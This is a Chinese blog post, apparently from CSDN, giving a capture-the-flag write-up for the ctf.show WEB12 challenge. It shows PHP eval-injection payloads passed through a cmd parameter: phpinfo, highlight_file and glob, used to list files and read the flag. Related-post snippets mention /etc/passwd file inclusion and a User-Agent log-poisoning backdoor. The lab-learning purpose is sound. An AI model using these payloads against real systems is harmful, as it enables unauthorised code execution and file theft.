CTF show WEB12CTF show WEB12

最新推荐文章于 2025-12-07 15:02:32 发布

原创最新推荐文章于 2025-12-07 15:02:32 发布 · 405 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#android

题目地址：https://ctf.show/

没有发现可用的注入点，应该不是注入

直接看源码

发现有

在网站上输入?cmd=phpinfo();有回显，猜测源码中应该为eval($_GET['cmd']);

在eval执行漏洞中，输入
?cmd=highlight_file("index.php");这个命令显示网站源码。

glob() 函数返回匹配指定模式的文件名或目录。
举个例子:
glob("*") 匹配任意文件
glob("*.txt")匹配以txt为后缀的文件

输入?cmd=print_r(glob("*"));

Array ( [0] => 903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php [1] => index.php )

flag就在那个很长名字的php文件中了。
我们使用highlight_file()函数成功输出该php文件中的源码。

cmd=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

2401_83364096

关注关注

9
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ctfshow web入门信息搜集

2301_79697181的博客

11-24

1940

访问/admin/是一个后台登入地址，尝试弱密码无果后发现可以选择忘记密码，需要填写所在城市，通过上面获得的QQ号进行搜索，信息上显示了属地是西安，提交后获得新密码：admin7789。访问/editor/目录，点击插入文件，选择文件空间，可以看到整个目录结构，在/var/www/html/nothinghere/fl000g.txt处发现flag文件。打开靶场使用dirsearch工具对靶场进行目录扫描，发现可以访问/admin/目录，并在网页的结尾发现泄露的QQ邮箱。

CTF-show WEB入门--web12

m0_73912575的博客

01-03

532

CTF-show WEB入门--web12

参与评论您还未登录，请先登录后发表或查看评论

ctf.show web入门

nidaxin的博客

01-21

7340

信息收集 web1:【where is flag】打开开发者工具 web2:【无法查看源代码】 ctrl+u或者开发者工具·都可以 web3:【where is flag】直接抓包，查看响应包 web4:【robots】 Robots协议:也称为爬虫协议、机器人协议等，其全称为“网络爬虫排除标准",它通常是一个叫做robots.txt的文本文件，一般放在网站的根目录下。网站通过Robots协议告诉搜索引擎哪些页面可以抓取，哪些页面不能抓取。先抓包，发现响应包里面并没有f.

CTF Show Web6

qq_62566956的博客

03-28

424

在上一题的wp中，看到了工具fzbk，使用之后发现所有备份文件都返回200= =，问了问群主之后发现这是nginx服务器的设置：遇到不存在的路径就直接跳转到默认的主页面，所以导致fzbk认为所有文件都可能存在。扫到备份文件之后直接访问，在www.zip中得到。解压源码到当前目录，测试正常，收工。因为fzbk有bug，再也不用了。直接访问txt文件即可。

CTF show WEB12

羽的博客

02-18

3456

题目地址：https://ctf.show/ 打开网站没有发现可用的注入点，应该不是注入了，直接看源码，发现提示?cmd=。在网站上输入?cmd=phpinfo();有回显，猜测源码中应该为eval($_GET['cmd']); 在eval执行漏洞中我们可以查看网页的源代码。我们输入 ?cmd=highlight_file("index.php");成功显示网站源码。这里再介绍一个php的函...

CTF SHOW WEB8

qq_53319483的博客

04-21

2249

CTF SHOW WEB8

ctf.show web3

weixin_71543329的博客

12-22

680

3.由于不知道本地文件的文件名称，所以使用php伪协议中的php://input。url=/etc/passwd测试一下，发现确实存在文件包含漏洞。还可以练习php伪协议中的php://filter 这是用来读取源码的。1.看到题目有include（）函数，想到是文件包含类的题目。4.查看两个文件内容就能知道flag。直接打开可以看到flag。

CTF SHOW web 签到题1

CTF

02-03

624

ctfshow{42b99472-9dab-440b-a50a-9e4d87d01388}打开容器发现，就一句话，直接查看源代码。发现有一段字符串，直接base64解码，发现flag。

ctf show-web66-70

2401_84499636的博客

11-19

346

66-70这几题的做法都一样，就是每个题的过滤不一样，这里自己整理了一下多种得到flag的方式，防止过滤先查看根目录里面有什么。

ctf.show web2

2401_88087539的博客

02-26

468

web新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

CTF show web4

qq_43039823的博客

07-22

1171

这个题长得跟web3很相似，但是实际上内容不同，得到flag的姿势也是各不相同。打开题目界面，依旧是老样子，上边光秃秃的就一句include ....结合上题目的知识很清晰的判断出是文件包含漏洞。“PHP：include(), include_once(), require()， require_once()等老姿势， url=/etc/passwd 依旧能读出用户的属性，文件包含确认！尝试着跟上一个题目的思路一样，打开burp 加上一句<?php system("ls")?&g...

ctf.show Web7

hp.puppy的博客

03-26

353

ctf.show Web4

hp.puppy的博客

03-24

448

1.首先, 访问一下web服务器的日志文件( Nginx日志文件的默认位置是/var/log/nginx/access.log)（Windows日志文件的默认位置是 C盘/Windows/system32/winevt/logs）2.使用代理工具( Burp Suite)在请求头User-Agent的内容中插入后门。3.使用蚁剑链接,注意url，删除https协议里的s。在www目录下发现flag.txt。

ctf.show Web3

hp.puppy的博客

03-24

250

使用代理工具( Burp Suite)抓包, 在POST请求体中输入需要执行的PHP代码, 执行系统命令:查看当前目录下的文件。用代理工具( Burp Suite)拦截请求, 在POST请求体中传递需要执行的PHP代码。发现一个名称为ctf_go_go_go和index.php的文件夹。也可以尝试查看index.php的内容。在url的参数中提交PHP伪协议。打开后出现这样的页面。

《零基础学PHP：从入门到实战》教程-模块七：MySQL 数据库基础-4

zwh821的博客

12-03

602

PHP连接MySQL数据库操作指南本章介绍了使用PHP的mysqli扩展连接和操作MySQL数据库的核心方法。主要内容包括：两种编程风格：面向对象和面向过程方式，推荐使用面向对象风格数据库连接：建立连接的标准流程和必要的错误处理 SQL操作： SELECT查询及结果处理 INSERT/UPDATE/DELETE操作安全防护：重点讲解SQL注入攻击原理演示不安全的字符串拼接方式的风险推荐使用预处理语句（prepare/bind_param/execute）作为唯一正确的防护手段通过代码示例展示

【Unity实战】如何使用VS Code在真实Android设备上调试 Unity应用

最新发布

Tealc

12-07

481

本文介绍两种通过 VS Code 调试运行在真实 Android 设备上 Unity C# 脚本的方法

数据库锁死解决途径

zjw541806的博客

12-05

本文详细介绍了多种数据库系统的锁检测方法，包括MySQL、PostgreSQL、SQL Server和Oracle。主要内容涵盖：1）通用检测思路，如识别锁类型和分析阻塞链；2）各数据库系统的特定查询命令，包括查看当前锁状态、阻塞关系和事务信息；3）关键监控指标与告警建议；4）诊断工具和自动化脚本；5）锁死问题的解决步骤和预防措施。文章强调应定期监控并分析根本原因，而非仅临时处理，同时提供了注意事项和检查清单，帮助DBA全面掌握数据库锁情况。

如何将照片从 Mac 传输到 Android

Digitally的博客

12-03

948

将照片从 Mac 传输到 Android 手机或平板电脑有时会感觉像是跨越数字鸿沟。由于 Mac 和 Android 运行在不同的生态系统中，直接拖放的方法行不通。如果您想将照片从 Mac 传输到 Android，可以尝试本指南中介绍的有效方法，这些方法可以高质量地传输照片。

Android 初学者入门：Fragment 与 ListView 基础概念与使用方法

am_g123的博客

12-03

398

类别关键点Fragment是 Activity 的子组件，用于构建可复用 UI 部分，适用于大屏适配。生命周期Fragment 生命周期依赖于 Activity，不可独立存在。托管机制必须由 Activity 或其他 Fragment 托管。动态管理使用 FragmentManager 进行 add/remove/replace 操作。通信方式通过 Activity 作为中介进行 Fragment 之间的通信。ListView使用 Adapter 绑定数据，自动适配列表长度，常见于商品、菜单等场景。

ctf show web签到题

07-29

以下是关于CTF Show Web签到题的解题思路和方法。 ### 解题思路 1. **SQL注入** SQL注入是一种常见的Web漏洞，通过构造特殊的输入来绕过程序的验证逻辑，从而获取数据库中的敏感信息。例如，在Web签到题中，可以...